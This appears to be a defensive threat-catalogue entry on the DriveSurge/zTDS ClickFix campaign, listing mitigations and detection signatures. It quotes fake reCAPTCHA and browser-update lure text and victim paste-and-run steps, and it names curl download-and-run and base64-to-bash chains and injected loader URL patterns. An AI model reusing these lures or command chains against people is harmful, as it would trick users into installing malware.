⚠️ Security Warning

ClickFix lures can lead to malware and computer viruses. If you see text like this online, it's likely a scam.

Back to Techniques

DriveSurge / zTDS ClickFix

DriveSurge is an Initial Access Broker that runs a Pay-Per-Install operation on top of compromised legitimate websites, using the open-source zTDS Traffic Distribution System to inject loader scripts and fingerprint visitors. Depending on the victim's OS it delivers one of several ClickFix variants. On Windows it shows FakeUpdates "your browser is out of date" overlays (impersonating 12 browser brands) or a ClickFix PowerShell paste. On macOS it silently rewrites the clipboard via navigator.clipboard.writeText and presents a fake reCAPTCHA modal ("I am not a robot - reCAPTCHA Verification ID: ") instructing the victim to open Terminal and paste, executing a curl-download-and-run or base64-decode-and-pipe-to-bash chain. The injected loaders use distinctive zTDS URL signatures (t.js?site=, t..js, ext-b..js, jsrepo?rnd=, banner-js.php), synchronous-XHR script injection, and site-owner evasion (skipping logged-in WordPress admins). Reported by Silent Push in 2026.

cross-platform browser CLI GUI

macOS Fake reCAPTCHA Clipboard Hijack

Try Example
GUI CLI

I am not a robot - reCAPTCHA Verification ID: . To verify you are human, open Terminal and paste (Command + V) the verification code, then press Return.

  1. Open Spotlight (Command + Space) and type Terminal

  2. Press Command + V to paste the 'verification code'

  3. Press Return to run it

References:

Mitigations:

  • Educate macOS users that legitimate CAPTCHAs never ask you to paste into Terminal

  • Alert on Terminal child processes spawning curl/bash shortly after a browser session

  • Monitor for curl ... -o <file> && bash <file> and base64 -D | bash execution chains

  • Block known DriveSurge/zTDS payload infrastructure at the DNS/proxy layer

Contributor: Michael Haag (2026-06-01)

Windows FakeUpdates Browser Update Lure

Try Example
GUI CLI

Your browser is out of date. A critical update is required to continue. Download and run the update to keep browsing securely.

  1. Click the Update / Download button on the fake browser-update overlay

  2. Run the delivered 'Browser Update.exe' (or paste the provided PowerShell 'fix')

References:

Mitigations:

  • Browsers update themselves — treat any web page demanding a manual browser update as malicious

  • Block execution of freshly-downloaded 'Browser Update.exe' style binaries via WDAC/AppLocker

  • Detect injected TDS loaders (t.js?site=, jsrepo?rnd=, banner-js.php) in web traffic

  • Hunt compromised CMS sites for zTDS injection and the wordpress_logged_in_ admin-evasion check

Contributor: Michael Haag (2026-06-01)